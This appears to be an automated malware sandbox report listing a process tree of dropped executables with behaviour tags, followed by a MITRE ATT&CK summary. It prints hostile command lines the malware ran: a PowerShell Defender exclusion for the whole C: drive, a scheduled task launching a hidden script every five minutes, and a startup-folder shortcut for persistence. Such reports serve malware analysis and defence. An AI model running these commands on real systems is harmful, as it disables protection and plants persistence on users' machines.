[level 10] C:\Users\Admin\AppData\Roaming\altuninstall_test\ShortcutTaskAgent.exe
  Command line: C:\Users\Admin\AppData\Roaming\altuninstall_test\ShortcutTaskAgent.exe
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  PID: 6764

[level 11] C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\SysWOW64\cmd.exe
  - Suspicious behavior: MapViewOfSection
  PID: 5096

[level 12] C:\Users\Admin\AppData\Local\Temp\pluginfast_Yj.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\pluginfast_Yj.exe
  - Loads dropped DLL
  PID: 8436

[level 7] C:\Users\Admin\AppData\Local\Temp\10206740101\7BzCs1a.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10206740101\7BzCs1a.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID: 6936

[level 8] C:\Users\Admin\AppData\Local\Temp\10206740101\7BzCs1a.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10206740101\7BzCs1a.exe"
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID: 6876

[level 7] C:\Users\Admin\AppData\Local\Temp\10206750101\v6Oqdnc.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10206750101\v6Oqdnc.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  PID: 11336

[level 7] C:\Users\Admin\AppData\Local\Temp\10206760101\eAzoDbY.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10206760101\eAzoDbY.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID: 7468

[level 8] C:\Users\Admin\AppData\Local\Temp\10206760101\eAzoDbY.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10206760101\eAzoDbY.exe"
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID: 7576

[level 8] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 7468 -s 408
  - Program crash
  PID: 7692

[level 7] C:\Users\Admin\AppData\Local\Temp\10206770101\8sb9w_003.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10206770101\8sb9w_003.exe"
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  PID: 8004

[level 8] C:\Windows\SYSTEM32\cmd.exe
  Command line: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
  PID: 8080

[level 9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell.exe Add-MpPreference -ExclusionPath 'C:'
  - Command and Scripting Interpreter: PowerShell
  PID: 8180

[level 8] C:\Windows\system32\svchost.exe
  Command line: "C:\Windows\system32\svchost.exe"
  - Downloads MZ/PE file
  - Adds Run key to start application
  PID: 8104

[level 9] C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exe
  Command line: "C:\ProgramData\{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}\ps.exe" ""
  - Executes dropped EXE
  PID: 8492

[level 9] C:\Users\Admin\AppData\Local\Temp\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\\{ED8B0E24-294A-4924-ABF6-1B4F6433B770}\cls.exe" "{66FE5BC5-AFB2-47E5-AD94-EB93039508DF}"
  - Executes dropped EXE
  PID: 8536

[level 7] C:\Users\Admin\AppData\Local\Temp\10206780101\XW3ITet.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10206780101\XW3ITet.exe"
  - Executes dropped EXE
  PID: 8368

[level 7] C:\Users\Admin\AppData\Local\Temp\10206790101\b8815974b5.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10206790101\b8815974b5.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID: 8684

[level 8] C:\Users\Admin\AppData\Local\Temp\10206790101\b8815974b5.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10206790101\b8815974b5.exe"
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID: 8736

[level 7] C:\Users\Admin\AppData\Local\Temp\10206800101\4625c3eb40.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\10206800101\4625c3eb40.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  PID: 9220

[level 2] C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
  - System Location Discovery: System Language Discovery
  PID: 7176

[level 3] C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID: 7352

[level 2] C:\Windows\SysWOW64\cmd.exe
  Command line: cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
  - Drops startup file
  - System Location Discovery: System Language Discovery
  PID: 7284

[level 1] C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID: 2268

[level 1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2204 -ip 2204
  PID: 2072

[level 1] C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID: 11944

[level 1] C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
  - Executes dropped EXE
  PID: 12256

[level 1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 5968 -ip 5968
  PID: 7192

[level 1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 7468 -ip 7468
  PID: 7612
MITRE ATT&CK Enterprise v15

Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)

Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Scheduled Task/Job (1)
  - Scheduled Task (1)

Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Scheduled Task/Job (1)
  - Scheduled Task (1)

Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (3)
  - Disable or Modify Tools (3)
- Modify Registry (5)
- Virtualization/Sandbox Evasion (2)

Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Unsecured Credentials (4)
  - Credentials In Files (4)
Downloads